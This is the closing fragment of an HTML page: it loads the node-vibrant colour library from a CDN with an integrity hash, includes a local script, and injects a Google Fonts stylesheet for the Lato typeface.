                src="https://cdn.jsdelivr.net/npm/node-vibrant@3.1.5/dist/vibrant.min.js"integrity="sha256-5NovOZc4iwiAWTYIFiIM7DxKUXKWvpVEuMEPLzcm5/g="crossorigin="anonymous"
                defer="false"
                >
            </script><script type="text/javascript" src="/ts/main.js" defer></script>
<script>
    (function () {
        const customFont = document.createElement('link');
        customFont.href = "https://fonts.googleapis.com/css2?family=Lato:wght@300;400;700&display=swap";

        customFont.type = "text/css";
        customFont.rel = "stylesheet";

        document.head.appendChild(customFont);
    }());
</script>

    </body>
</html>
